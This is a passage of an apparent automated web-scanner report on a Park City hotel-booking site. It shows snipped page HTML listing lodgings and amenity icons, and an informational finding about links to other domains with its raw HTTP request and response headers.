src='http://s3.amazonaws.com/book_direct_images/amenities/20b34cc2545d9bbfc011472d08597e19.png' title='Restaurants' alt='Restaurants' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Restaurants']); toggle_amenity('7', '042de5248e8fa72df3c87db8fc48345b.png', '20b34cc2545d9bbfc011472d08597e19.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/462fdff39e49769ef18a4e9c44691760.png' title='High Speed Internet' alt='High Speed Internet' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','High Speed Internet']); toggle_amenity('3', 'bfa9115d65ee2e68af501bd7cc5ac344.png', '462fdff39e49769ef18a4e9c44691760.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1453&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1453]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2a733136b1c01bbb4f6f69765b281ea2.jpg" title="Goldener Hirsch Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1421&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1421]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" title="Hotel Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1430&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1430]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a4d89b68f8b48f521b0e56530a06e1a3.jpg" title="Yarrow Resort Hotel and Conference"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1455&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1455]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c7dd3e7c036e97661e0daff81f68ca3.jpg" title="Best Western Landmark Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1448&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1448]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f8c01d2b5755a239851e388436ec65b5.jpg" title="The Sky Lodge"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1436]); ><img src="http://s3.amazonaws.com/book_direct_images/l_3ab163ded569043a5ba8d6b7c415bc3e.jpg" title="Marriott MountainSide Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1432&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1432]); ><img src="http://s3.amazonaws.com/book_direct_images/l_63a19802a5b81e8243fa8be9beb55177.jpg" title="The Chateaux at Silver Lake"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1389&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1389]); ><img src="http://s3.amazonaws.com/book_direct_images/l_014e8136e32c6e08fc4c5c410d3fa4b8.jpg" title="Woodside Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=7369&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',7369]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4479851d723539b1b9aafdc8788733a5.jpg" title="Waldorf Astoria Park City"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1386&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1386]); ><img src="http://s3.amazonaws.com/book_direct_images/l_88eb84a3441f85a2f3a5d33a2f622cad.jpg" title="Best Western Holiday Hills"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1411&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1411]); ><img src="http://s3.amazonaws.com/book_direct_images/l_bb5ef24549b781ea64501b3093562538.jpg" title="Prospector Square Lodge & Conference Center"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1426&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1426]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a11a7104ddd179b256e77fe3f0c22d0a.jpg" title="Resorts West"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1493&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1493]); ><img src="http://s3.amazonaws.com/book_direct_images/l_92759ea5ad34825356e258a2597880a3.jpg" title="Jupiter Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1456&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1456]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" title="Hampton Inn & Suites Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1431&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1431]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a6a81cccd7ebdf5fb4ea5b8f947bb2ad.jpg" title="Westgate Park City Resort & Spa"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1416&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1416]); ><img src="http://s3.amazonaws.com/book_direct_images/l_0bc03da7d4c0f4726e437c0c05f82dfe.jpg" title="Utah Vacation Homes"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1395&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1395]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5a78eab8112163a9d9730176e33302ee.jpg" title="Blooming Resort Rentals"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1423&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1423]); ><img src="http://s3.amazonaws.com/book_direct_images/l_0926290e36497f874e75b8fc0d6f42e2.jpg" title="The Miner's Club"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1414&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1414]); ><img src="http://s3.amazonaws.com/book_direct_images/l_7951d02d53be187fd1b816324c20e911.jpg" title="ResortQuest Park City"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=38674&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',38674]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a75817cf46b015b0ada26f94b8671ba2.jpg" title="The Trace Bed & Breakfast"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1472&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1472]); ><img src="http://s3.amazonaws.com/book_direct_images/l_83adc03df48457d6f265ad6d3a7772fd.jpg" title="Three Kings Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1424&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1424]); ><img src="http://s3.amazonaws.com/book_direct_images/l_48ac0a67bd4711885228fc52a881ef28.jpg" title="Park City Marriott"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1732&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1732]); ><img src="http://s3.amazonaws.com/book_direct_images/l_c1182445a8474a77a929b606672e0326.jpg" title="Town Lift & Lift Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1407&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1407]); ><img src="http://s3.amazonaws.com/book_direct_images/l_ac62d92cecf212dfb615b53378f330e6.jpg" title="Park Plaza Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1443&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1443]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4737531affac3ba0cc95a9a060e1629d.jpg" title="The Treasure Mountain Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1438&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1438]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4be5b8142164d2f1728b2df3a2044d8e.jpg" title="Park Station Condominium Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1441&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1441]); ><img src="http://s3.amazonaws.com/book_direct_images/l_e4bcd72250ffd5a9ef11c541cd6193a4.jpg" title="The Canyons Sundial Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1428&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1428]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6efd5f230e5862e2fc8845240d89e88d.jpg" title="Silver Queen Boutique Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1419&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1419]); ><img src="http://s3.amazonaws.com/book_direct_images/l_181b9155b3a729276978989bd94512f1.jpg" title="Chateau Apres"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=37580&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',37580]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5d4fd2686113fcef79928ad9d5433747.jpg" title="The Canyons Escala Lodges"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/57eb7130536632921d0c11351a0a7388.gif' title='Parking Not Available' alt='Parking Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/1560122293a8d9ce4d090a1f6f5f32b2.gif' title='High Speed Internet Not Available' alt='High Speed Internet Not Available' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1572&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1572]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8984bb33e54bd9d2372be2edbef9a879.jpg" title="Mountain Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1492&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1492]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4481362da4bc35517e632ff665d87379.jpg" title="Kamas Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1437&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1437]); ><img src="http://s3.amazonaws.com/book_direct_images/l_be0999e9760d8fb45524f27fab9151e9.jpg" title="Marriott Summit Watch at Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1399&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1399]); ><img src="http://s3.amazonaws.com/book_direct_images/l_67e540c507b5b60fdcf171e8120b3276.jpg" title="Condominium Rentals of Park City/Intermountain Lodging"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1494&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1494]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a8ff4764a200d7ca7b4ca45930d1d6be.jpg" title="Park City Canyons Properties"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1387&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1387]); ><img src="http://s3.amazonaws.com/book_direct_images/l_cea00e0ba9eb0e3a81aae3473d190992.jpg" title="Star Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1394&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1394]); ><img src="http://s3.amazonaws.com/book_direct_images/l_ceeb1a473a01bf9e407c24f353e25294.jpg" title="Aspens Ski Condo Rentals"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=41699&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',41699]); ><img src="http://s3.amazonaws.com/book_direct_images/l_7c22ec34b45580c141c00b7ad5ac0e22.jpg" title="Park City Crash Pads"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1405&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1405]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a824f4d448a76e7d475537d825245ce5.jpg" title="Park Avenue Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1384&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1384]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5e5e0e7a36afd90ba3dbda2fb1903686.jpg" title="Park City Lodging, Inc."></a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.4. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=982 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: parkcitytrips.com
Cookie: PHPSESSID=rtbf9mia87rdbeie5r94s1lge3; SERVERID=i-07d1a66e
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:53:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 424483


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
